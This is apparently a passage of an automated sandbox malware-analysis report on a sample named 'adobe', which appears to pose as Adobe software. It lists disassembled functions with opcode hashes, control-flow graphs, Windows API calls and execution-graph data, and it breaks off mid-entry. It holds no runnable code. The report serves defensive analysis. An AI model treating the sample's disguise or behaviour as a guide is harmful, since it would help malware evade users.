                                                  • Opcode ID: 8c89efaf60a662095b0a3946cf5dada0a5d5c801a4757bb2febd475f63ac48e5
                                                  • Instruction ID: f5c4ada8b070f366356bca696482e4f3117223cca7cdbbd2df386f8ce0133db8
                                                  • Opcode Fuzzy Hash: 8c89efaf60a662095b0a3946cf5dada0a5d5c801a4757bb2febd475f63ac48e5
                                                  • Instruction Fuzzy Hash: 3241D1B4C0061DCBDB24DFA9C884B9DBBB5FF49308F60806AD408AB255DB75694ACF90
                                                  Function 0288D458 Relevance: 1.6, APIs: 1, Instructions: 70COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 510 288d458-288d45a 511 288d45c 510->511 512 288d460-288d463 510->512 513 288d45e 511->513 514 288d4a2-288d4f4 DuplicateHandle 511->514 515 288d464-288d49f 512->515 513->512 513->515 516 288d4fd-288d51a 514->516 517 288d4f6-288d4fc 514->517 515->514 517->516
                                                  APIs
                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0288D426,?,?,?,?,?), ref: 0288D4E7
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2240729304.0000000002880000.00000040.00000800.00020000.00000000.sdmp, Offset: 02880000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_2880000_adobe.jbxd
                                                  Similarity
                                                  • API ID: DuplicateHandle
                                                  • String ID:
                                                  • API String ID: 3793708945-0
                                                  • Opcode ID: 939f98cb5bbf615d3c0b459fa15d6832c05d6e82ae02374e78f1e3d9c017c979
                                                  • Instruction ID: a3ec6a409958553728eb937a059ef42853ad666330ec5c8a7f35f7dd156066ea
                                                  • Opcode Fuzzy Hash: 939f98cb5bbf615d3c0b459fa15d6832c05d6e82ae02374e78f1e3d9c017c979
                                                  • Instruction Fuzzy Hash: F53168B98002499FDB10CFAAD584BDEFFF4EF49320F14805AE918A7250C378A941CFA0
                                                  Function 0288B4C0 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 520 288b4c0-288d4f4 DuplicateHandle 524 288d4fd-288d51a 520->524 525 288d4f6-288d4fc 520->525 525->524
                                                  APIs
                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0288D426,?,?,?,?,?), ref: 0288D4E7
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2240729304.0000000002880000.00000040.00000800.00020000.00000000.sdmp, Offset: 02880000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_2880000_adobe.jbxd
                                                  Similarity
                                                  • API ID: DuplicateHandle
                                                  • String ID:
                                                  • API String ID: 3793708945-0
                                                  • Opcode ID: 8cf2164ccf32abbca807486268a59cf1f9085a6f4f16412f2ad95b3008e2efe0
                                                  • Instruction ID: 65a7c66ed50ff6529cfe9a5d8a7c7ce5d9526b156cdb81aa3eb0909b9c1141d7
                                                  • Opcode Fuzzy Hash: 8cf2164ccf32abbca807486268a59cf1f9085a6f4f16412f2ad95b3008e2efe0
                                                  • Instruction Fuzzy Hash: 5821E6B5900208AFDB10DFAAD584AEEBBF4FB48314F14841AE918A3350D378A954CFA4
                                                  Function 04F76B08 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 535 4f76b08-4f7924a PostMessageW 537 4f79253-4f79267 535->537 538 4f7924c-4f79252 535->538 538->537
                                                  APIs
                                                  • PostMessageW.USER32(?,00000010,00000000,?), ref: 04F7923D
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2243054395.0000000004F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F70000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_4f70000_adobe.jbxd
                                                  Similarity
                                                  • API ID: MessagePost
                                                  • String ID:
                                                  • API String ID: 410705778-0
                                                  • Opcode ID: e675a49ff36e2a0700b7c4b9c91cb60eaf1ff405f435f43778b3a9947b250c03
                                                  • Instruction ID: dd33902a7598d61a592eeffc7e7c0a03f451a6e93653d7b4fd08218293d316e4
                                                  • Opcode Fuzzy Hash: e675a49ff36e2a0700b7c4b9c91cb60eaf1ff405f435f43778b3a9947b250c03
                                                  • Instruction Fuzzy Hash: 861106B5804348DFEB10DF99D445BDEBBF8FB49310F10845AE518A7200C3B9A944CFA5
                                                  Function 0288B050 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 528 288b050-288b090 530 288b098-288b0c3 GetModuleHandleW 528->530 531 288b092-288b095 528->531 532 288b0cc-288b0e0 530->532 533 288b0c5-288b0cb 530->533 531->530 533->532
                                                  APIs
                                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 0288B0B6
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2240729304.0000000002880000.00000040.00000800.00020000.00000000.sdmp, Offset: 02880000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_2880000_adobe.jbxd
                                                  Similarity
                                                  • API ID: HandleModule
                                                  • String ID:
                                                  • API String ID: 4139908857-0
                                                  • Opcode ID: a3f7898e907b0c0cc0d9d4d018ef12de44a1a307d8a10651550718976352b75d
                                                  • Instruction ID: e9e33b353f89b3641dc895e9d965b1e0222e6f87c12b1c4107d7e049e1a1decc
                                                  • Opcode Fuzzy Hash: a3f7898e907b0c0cc0d9d4d018ef12de44a1a307d8a10651550718976352b75d
                                                  • Instruction Fuzzy Hash: 0F11DFB9C007498FDB20DF9AC444A9EFBF4EF89224F10845AD529A7210C379A549CFA5
                                                  Function 04F791DF Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 540 4f791df-4f7924a PostMessageW 541 4f79253-4f79267 540->541 542 4f7924c-4f79252 540->542 542->541
                                                  APIs
                                                  • PostMessageW.USER32(?,00000010,00000000,?), ref: 04F7923D
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2243054395.0000000004F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F70000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_4f70000_adobe.jbxd
                                                  Similarity
                                                  • API ID: MessagePost
                                                  • String ID:
                                                  • API String ID: 410705778-0
                                                  • Opcode ID: 7c74e928272f21bb9b2f3bcbac926b0c1eaf548c3c5eda51a6099a1bb1ad46a9
                                                  • Instruction ID: 7c4a79d006e53f1b933dd12f1c25074b644ae9beae64f608b353eec897a7d409
                                                  • Opcode Fuzzy Hash: 7c74e928272f21bb9b2f3bcbac926b0c1eaf548c3c5eda51a6099a1bb1ad46a9
                                                  • Instruction Fuzzy Hash: 2611D0B58002499FDB10DF9AD485BDEBBF8EB49320F20845AE518A7200C379A945CFA1
                                                  Function 00B1D3D8 Relevance: .1, Instructions: 75COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2238535892.0000000000B1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B1D000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_b1d000_adobe.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 4718c51ea9391b7181c51106ed75143171dca9ddd2e6519593ddf9878419bf2f
                                                  • Instruction ID: 17e9bd6d9228aa2a2e57f67f2d951c8f4fb83053f9833f348a8bafd4ef94f115
                                                  • Opcode Fuzzy Hash: 4718c51ea9391b7181c51106ed75143171dca9ddd2e6519593ddf9878419bf2f
                                                  • Instruction Fuzzy Hash: 3A213A71500204DFDB05DF14D9C0F56BFA5FB98314F60C5A9E9090B356C33AE896D7A2
                                                  Function 00B1D4C4 Relevance: .1, Instructions: 75COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2238535892.0000000000B1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B1D000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_b1d000_adobe.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d3c910171c20409a78fb89890109778dfd3b246474b0118e28dc686503329fe5
                                                  • Instruction ID: b9043be20c103a928d2f259e358cd492eaf26f0e91344fc90136115678561475
                                                  • Opcode Fuzzy Hash: d3c910171c20409a78fb89890109778dfd3b246474b0118e28dc686503329fe5
                                                  • Instruction Fuzzy Hash: A3213471500240DFDB15DF14D9C0F66BFA6FBA8318F60C5A9E9090B256C33AD896DBB2
                                                  Function 00E0D01C Relevance: .1, Instructions: 72COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2240122366.0000000000E0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E0D000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_e0d000_adobe.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ad8eba4030ff1ceef2b9280eaa835b05095ba6b813a69ad368b1c49545f03cee
                                                  • Instruction ID: 845d7ddb80b441fce15e9cf83ebaf8f893378956ff9ef6549fb073144c91a875
                                                  • Opcode Fuzzy Hash: ad8eba4030ff1ceef2b9280eaa835b05095ba6b813a69ad368b1c49545f03cee
                                                  • Instruction Fuzzy Hash: EC212271608200DFCB14DF64D980B26BF66FB88318F20C569D84E5B296C33AD887CB62
                                                  Function 00E0D005 Relevance: .1, Instructions: 62COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2240122366.0000000000E0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E0D000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_e0d000_adobe.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e2a37123b7b4255b60a15e701cfcab6f5950fa700fc61e4ebdb390f24398de62
                                                  • Instruction ID: 0bd6add6334a8fb5f97a11a1c02f2cd266b29e3da6904cdf6da137bf86ee697a
                                                  • Opcode Fuzzy Hash: e2a37123b7b4255b60a15e701cfcab6f5950fa700fc61e4ebdb390f24398de62
                                                  • Instruction Fuzzy Hash: 5B21837550D3808FC702CF24D994715BF71EB46314F28C5DAD8498B6A7C33A984ACB62
                                                  Function 00B1D3D3 Relevance: .1, Instructions: 56COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2238535892.0000000000B1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B1D000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_b1d000_adobe.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                                  • Instruction ID: e568307c233cd5a6929b25392f6c6ef876908c740f2999364683449133d8c74c
                                                  • Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                                  • Instruction Fuzzy Hash: 97110372504240CFCB16CF00D5C4B56BFB1FB98324F24C6A9D9090B356C33AE85ACBA2
                                                  Function 00B1D4BF Relevance: .1, Instructions: 56COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2238535892.0000000000B1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B1D000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_b1d000_adobe.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                                  • Instruction ID: 9bdc1c9caf17d8ea49a38860db2dd98900a5ac37010fcf288a41bb4d99e9896c
                                                  • Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                                  • Instruction Fuzzy Hash: E511D376504280CFCB16CF14D5C4B56BFB2FBA8314F24C6A9D9490B656C336D85ACBA2

                                                  Execution Graph

                                                  Execution Coverage:9.1%
                                                  Dynamic/Decrypted Code Coverage:100%
                                                  Signature Coverage:0%
                                                  Total number of Nodes:19
                                                  Total number of Limit Nodes:4
                                                  execution_graph 38267 e00848 38269 e0084e 38267->38269 38268 e0091b 38269->38268 38271 e01350 38269->38271 38273 e01351 38271->38273 38272 e01346 38272->38269 38273->38272 38275 e08221 38273->38275 38277 e0822b 38275->38277 38276 e082e1 38276->38273 38277->38276 38280 675f9c1 38277->38280 38285 675f9d0 38277->38285 38282 675f9e5 38280->38282 38281 675fbfa 38281->38276 38282->38281 38283 675fe74 GlobalMemoryStatusEx GlobalMemoryStatusEx 38282->38283 38284 675fc11 GlobalMemoryStatusEx GlobalMemoryStatusEx 38282->38284 38283->38282 38284->38282 38287 675f9e5 38285->38287 38286 675fbfa 38286->38276 38287->38286 38288 675fe74 GlobalMemoryStatusEx GlobalMemoryStatusEx 38287->38288 38289 675fc11 GlobalMemoryStatusEx GlobalMemoryStatusEx 38287->38289 38288->38287 38289->38287

                                                  Executed Functions

                                                  Function 067534A8 Relevance: 8.0, Strings: 6, Instructions: 545COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 124 67534a8-67534c9 125 67534cb-67534ce 124->125 126 67534f4-67534f7 125->126 127 67534d0-67534ef 125->127 128 67534fd-675351c 126->128 129 6753c98-6753c9a 126->129 127->126 137 6753535-675353f 128->137 138 675351e-6753521 128->138 131 6753ca1-6753ca4 129->131 132 6753c9c 129->132 131->125 134 6753caa-6753cb3 131->134 132->131 141 6753545-6753554 137->141 138->137 139 6753523-6753533 138->139 139->141 251 6753556 call 6753cc0 141->251 252 6753556 call 6753cc8 141->252 143 675355b-6753560 144 6753562-6753568 143->144 145 675356d-675384a 143->145 144->134 166 6753850-67538ff 145->166 167 6753c8a-6753c97 145->167 176 6753901-6753926 166->176 177 6753928 166->177 179 6753931-6753944 176->179 177->179 181 6753c71-6753c7d 179->181 182 675394a-675396c 179->182 181->166 183 6753c83 181->183 182->181 185 6753972-675397c 182->185 183->167 185->181 186 6753982-675398d 185->186 186->181 187 6753993-6753a69 186->187 199 6753a77-6753aa7 187->199 200 6753a6b-6753a6d 187->200 204 6753ab5-6753ac1 199->204 205 6753aa9-6753aab 199->205 200->199 206 6753b21-6753b25 204->206 207 6753ac3-6753ac7 204->207 205->204 208 6753c62-6753c6b 206->208 209 6753b2b-6753b67 206->209 207->206 210 6753ac9-6753af3 207->210 208->181 208->187 221 6753b75-6753b83 209->221 222 6753b69-6753b6b 209->222 217 6753af5-6753af7 210->217 218 6753b01-6753b1e call 67523a0 210->218 217->218 218->206 225 6753b85-6753b90 221->225 226 6753b9a-6753ba5 221->226 222->221 225->226 231 6753b92 225->231 229 6753ba7-6753bad 226->229 230 6753bbd-6753bce 226->230 232 6753bb1-6753bb3 229->232 233 6753baf 229->233 235 6753be6-6753bf2 230->235 236 6753bd0-6753bd6 230->236 231->226 232->230 233->230 240 6753bf4-6753bfa 235->240 241 6753c0a-6753c5b 235->241 237 6753bd8 236->237 238 6753bda-6753bdc 236->238 237->235 238->235 242 6753bfc 240->242 243 6753bfe-6753c00 240->243 241->208 242->241 243->241 251->143 252->143
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4499943228.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6750000_adobe.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $]q$$]q$$]q$$]q$$]q$$]q
                                                  • API String ID: 0-3723351465
                                                  • Opcode ID: be89287ec64486109fd5b6283b35c88892e53fd2870113645676e380cba50dfa
                                                  • Instruction ID: 4e3ccf2bef8de8b71602b14b85242778ac3e7325c0b8d669bbd2ef11c7a8490a
                                                  • Opcode Fuzzy Hash: be89287ec64486109fd5b6283b35c88892e53fd2870113645676e380cba50dfa
                                                  • Instruction Fuzzy Hash: 34322E31E10619CFCB15EF79C89499DB7B2FF89300F11C6AAD449A7264EF70A985CB90
                                                  Function 06757DC8 Relevance: 3.0, Strings: 2, Instructions: 470COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 796 6757dc8-6757de6 797 6757de8-6757deb 796->797 798 6757ded-6757df7 797->798 799 6757df8-6757dfb 797->799 800 6757dfd-6757e19 799->800 801 6757e1e-6757e21 799->801 800->801 802 6757e23-6757e3d 801->802 803 6757e42-6757e45 801->803 802->803 805 6757e47-6757e55 803->805 806 6757e5c-6757e5e 803->806 810 6757e6e-6757e84 805->810 814 6757e57 805->814 807 6757e65-6757e68 806->807 808 6757e60 806->808 807->797 807->810 808->807 816 675809f-67580a9 810->816 817 6757e8a-6757e93 810->817 814->806 818 6757e99-6757eb6 817->818 819 67580aa-67580df 817->819 828 675808c-6758099 818->828 829 6757ebc-6757ee4 818->829 822 67580e1-67580e4 819->822 824 6758197-675819a 822->824 825 67580ea-67580f6 822->825 826 67583c6-67583c9 824->826 827 67581a0-67581af 824->827 830 6758101-6758103 825->830 831 67583ec-67583ee 826->831 832 67583cb-67583e7 826->832 844 67581b1-67581cc 827->844 845 67581ce-6758209 827->845 828->816 828->817 829->828 849 6757eea-6757ef3 829->849 833 6758105-675810b 830->833 834 675811b-6758122 830->834 837 67583f5-67583f8 831->837 838 67583f0 831->838 832->831 840 675810d 833->840 841 675810f-6758111 833->841 842 6758124-6758131 834->842 843 6758133 834->843 837->822 839 67583fe-6758407 837->839 838->837 840->834 841->834 847 6758138-675813a 842->847 843->847 844->845 855 675820f-6758220 845->855 856 675839a-67583b0 845->856 850 6758151-675818a 847->850 851 675813c-675813f 847->851 849->819 857 6757ef9-6757f15 849->857 850->827 876 675818c-6758196 850->876 851->839 864 6758385-6758394 855->864 865 6758226-6758243 855->865 856->826 866 6757f1b-6757f45 857->866 867 675807a-6758086 857->867 864->855 864->856 865->864 877 6758249-675833f call 67565e8 865->877 880 6758070-6758075 866->880 881 6757f4b-6757f73 866->881 867->828 867->849 929 6758341-675834b 877->929 930 675834d 877->930 880->867 881->880 887 6757f79-6757fa7 881->887 887->880 893 6757fad-6757fb6 887->893 893->880 894 6757fbc-6757fee 893->894 902 6757ff0-6757ff4 894->902 903 6757ff9-6758015 894->903 902->880 905 6757ff6 902->905 903->867 904 6758017-675806e call 67565e8 903->904 904->867 905->903 931 6758352-6758354 929->931 930->931 931->864 932 6758356-675835b 931->932 933 675835d-6758367 932->933 934 6758369 932->934 935 675836e-6758370 933->935 934->935 935->864 936 6758372-675837e 935->936 936->864
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4499943228.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6750000_adobe.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $]q$$]q
                                                  • API String ID: 0-127220927
                                                  • Opcode ID: bde5aeb9e2614fc5d343cfe8aa3c7173fe682d2d5895414b42bea00f223c91b9
                                                  • Instruction ID: 386ca5328e33fe29b49fd6d5da309280d683df33b3200d80dcabe499569306fd
                                                  • Opcode Fuzzy Hash: bde5aeb9e2614fc5d343cfe8aa3c7173fe682d2d5895414b42bea00f223c91b9
                                                  • Instruction Fuzzy Hash: 8502AE30B002159FDB58DF68D490AAEB7E2FF84304F2585A9D809DB395DB75EC42CB92
                                                  Function 067555E8 Relevance: 1.8, Strings: 1, Instructions: 594COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1674 67555e8-6755605 1675 6755607-675560a 1674->1675 1676 6755612-6755615 1675->1676 1677 675560c-675560d 1675->1677 1678 6755617-675561e 1676->1678 1679 6755623-6755626 1676->1679 1677->1676 1678->1679 1680 6755635-6755638 1679->1680 1681 6755628-675562e 1679->1681 1683 675563a-675563d 1680->1683 1684 6755642-6755645 1680->1684 1682 6755630 1681->1682 1681->1683 1682->1680 1683->1684 1685 6755647-6755659 1684->1685 1686 675565e-6755661 1684->1686 1685->1686 1687 6755687-675568a 1686->1687 1688 6755663-6755682 1686->1688 1689 6755694-6755697 1687->1689 1690 675568c-675568f 1687->1690 1688->1687 1692 6755721-6755727 1689->1692 1693 675569d-67556a0 1689->1693 1690->1689 1697 6755733-6755739 1692->1697 1698 6755729 1692->1698 1695 67556b3-67556b6 1693->1695 1696 67556a2-67556a8 1693->1696 1695->1696 1702 67556b8-67556bb 1695->1702 1700 6755762-675576c 1696->1700 1701 67556ae 1696->1701 1704 67557b3-67557e3 1697->1704 1705 675573b-6755743 1697->1705 1703 675572e-6755731 1698->1703 1711 6755773-6755775 1700->1711 1701->1695 1706 67556bd-67556ca 1702->1706 1707 67556cf-67556d2 1702->1707 1703->1697 1708 675575d-6755760 1703->1708 1723 67557ed-67557f0 1704->1723 1705->1704 1709 6755745-6755752 1705->1709 1706->1707 1712 67556d4-67556d8 1707->1712 1713 67556e3-67556e6 1707->1713 1708->1700 1710 675577a-675577d 1708->1710 1709->1704 1715 6755754-6755758 1709->1715 1718 675577f-6755788 1710->1718 1719 6755789-675578c 1710->1719 1711->1710 1721 67557a5-67557b2 1712->1721 1722 67556de 1712->1722 1716 6755703-6755706 1713->1716 1717 67556e8-67556fe 1713->1717 1715->1708 1724 675571c-675571f 1716->1724 1725 6755708-6755717 1716->1725 1717->1716 1726 6755793-6755795 1719->1726 1727 675578e-6755790 1719->1727 1722->1713 1728 67557f2-67557f9 1723->1728 1729 67557fa-67557fd 1723->1729 1724->1692 1724->1703 1725->1724 1733 6755797 1726->1733 1734 675579c-675579f 1726->1734 1727->1726 1731 6755811-6755814 1729->1731 1732 67557ff-6755806 1729->1732 1737 6755836-6755839 1731->1737 1738 6755816-675581a 1731->1738 1735 675580c 1732->1735 1736 67558ce-67558d5 1732->1736 1733->1734 1734->1675 1734->1721 1735->1731 1742 6755851-6755854 1737->1742 1743 675583b-675584c 1737->1743 1740 67558d6-67558e8 1738->1740 1741 6755820-6755828 1738->1741 1752 6755918-6755919 1740->1752 1753 67558ea-6755914 1740->1753 1741->1740 1744 675582e-6755831 1741->1744 1745 6755856-675585a 1742->1745 1746 675586e-6755871 1742->1746 1743->1742 1744->1737 1745->1740 1751 675585c-6755864 1745->1751 1747 6755873-675587d 1746->1747 1748 6755882-6755885 1746->1748 1747->1748 1754 6755887-675588b 1748->1754 1755 675589f-67558a2 1748->1755 1751->1740 1756 6755866-6755869 1751->1756 1759 6755927-675592a 1752->1759 1760 675591b-6755922 1752->1760 1758 6755916 1753->1758 1754->1740 1761 675588d-6755895 1754->1761 1762 67558a4-67558a8 1755->1762 1763 67558bc-67558be 1755->1763 1756->1746 1758->1752 1765 6755934-6755937 1759->1765 1766 675592c-6755931 1759->1766 1760->1759 1761->1740 1764 6755897-675589a 1761->1764 1762->1740 1767 67558aa-67558b2 1762->1767 1768 67558c5-67558c8 1763->1768 1769 67558c0 1763->1769 1764->1755 1770 6755945-6755948 1765->1770 1771 6755939-6755940 1765->1771 1766->1765 1767->1740 1772 67558b4-67558b7 1767->1772 1768->1723 1768->1736 1769->1768 1773 67559cd-6755b61 1770->1773 1774 675594e-6755951 1770->1774 1771->1770 1772->1763 1825 6755c97-6755caa 1773->1825 1826 6755b67-6755b6e 1773->1826 1775 6755953-6755964 1774->1775 1776 675596b-675596e 1774->1776 1780 675598d-675599e 1775->1780 1783 6755966 1775->1783 1778 6755970-6755981 1776->1778 1779 6755988-675598b 1776->1779 1787 67559ae-67559c1 1778->1787 1789 6755983 1778->1789 1779->1780 1781 67559a9-67559ac 1779->1781 1780->1760 1792 67559a4 1780->1792 1786 67559c4-67559c7 1781->1786 1781->1787 1783->1776 1786->1773 1788 6755cad-6755cb0 1786->1788 1793 6755cb2-6755cc3 1788->1793 1794 6755cce-6755cd1 1788->1794 1789->1779 1792->1781 1793->1760 1801 6755cc9 1793->1801 1796 6755cd3-6755ce4 1794->1796 1797 6755cef-6755cf2 1794->1797 1796->1760 1805 6755cea 1796->1805 1797->1773 1798 6755cf8-6755cfa 1797->1798 1803 6755d01-6755d04 1798->1803 1804 6755cfc 1798->1804 1801->1794 1803->1758 1806 6755d0a-6755d13 1803->1806 1804->1803 1805->1797 1827 6755b74-6755b97 1826->1827 1828 6755c22-6755c29 1826->1828 1837 6755b9f-6755ba7 1827->1837 1828->1825 1829 6755c2b-6755c5e 1828->1829 1841 6755c60 1829->1841 1842 6755c63-6755c90 1829->1842 1839 6755bac-6755bed 1837->1839 1840 6755ba9 1837->1840 1850 6755c05-6755c16 1839->1850 1851 6755bef-6755c00 1839->1851 1840->1839 1841->1842 1842->1806 1850->1806 1851->1806
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4499943228.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6750000_adobe.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $
                                                  • API String ID: 0-3993045852
                                                  • Opcode ID: 7a9607328d592cbba66aff0028debaf6b92957fa488ace3986d70a3631251c84
                                                  • Instruction ID: ac5503821b0095681da8b951475cf4f144d72c9edea1336c0ad5ee3d8c0adf16
                                                  • Opcode Fuzzy Hash: 7a9607328d592cbba66aff0028debaf6b92957fa488ace3986d70a3631251c84
                                                  • Instruction Fuzzy Hash: A722D231E002199FEF60DFA4C4806AEB7B2EF85320F2585A9D849AB345DB75DD42CB91
                                                  Function 06752728 Relevance: 1.0, Instructions: 1047COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4499943228.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6750000_adobe.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b1d4b1c00d439d43048a21a7593212d01d83ad42607d614805bbcadd60827eb1
                                                  • Instruction ID: f519c3a6b817b15d154cba3edb6ebddf05413128dc5b75496c8b05ec374fb82f
                                                  • Opcode Fuzzy Hash: b1d4b1c00d439d43048a21a7593212d01d83ad42607d614805bbcadd60827eb1
                                                  • Instruction Fuzzy Hash: 25927A30E002048FDB64DB68C584AADB7F2FB45314F5684A9D859AB362EB75ED42CF80
                                                  Function 06756638 Relevance: .8, Instructions: 812COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4499943228.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6750000_adobe.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a1be814ebf0b5fa54ab54645fed2bb3bc23a26844d4ca2e1d6f5cd46e4843ef6
                                                  • Instruction ID: 5f92d91ce4d433e843f6d5d39cb2b9885054be6859fbf221f07358913e42103e
                                                  • Opcode Fuzzy Hash: a1be814ebf0b5fa54ab54645fed2bb3bc23a26844d4ca2e1d6f5cd46e4843ef6
                                                  • Instruction Fuzzy Hash: 5162E134B002048FDB54DB68D584AADB7F2EF84314F6585A9E809EB3A5DB75EC42CB90
                                                  Function 0675C1D8 Relevance: .6, Instructions: 637COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4499943228.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6750000_adobe.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e24506246503c9008a06f222d3d7badeaad245d355b2a3cb699b9aa3f3ea7a1c
                                                  • Instruction ID: 67446048a8e6cb0037861f25c216fc89f451c816f172cc19dd83e3b69f543ff3
                                                  • Opcode Fuzzy Hash: e24506246503c9008a06f222d3d7badeaad245d355b2a3cb699b9aa3f3ea7a1c
                                                  • Instruction Fuzzy Hash: 5B32DF30B002098FDF55DF68D880BAEB7B6EB89310F1185A9E805E7395DB75EC46CB91
                                                  Function 0675B26F Relevance: .6, Instructions: 570COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4499943228.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6750000_adobe.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
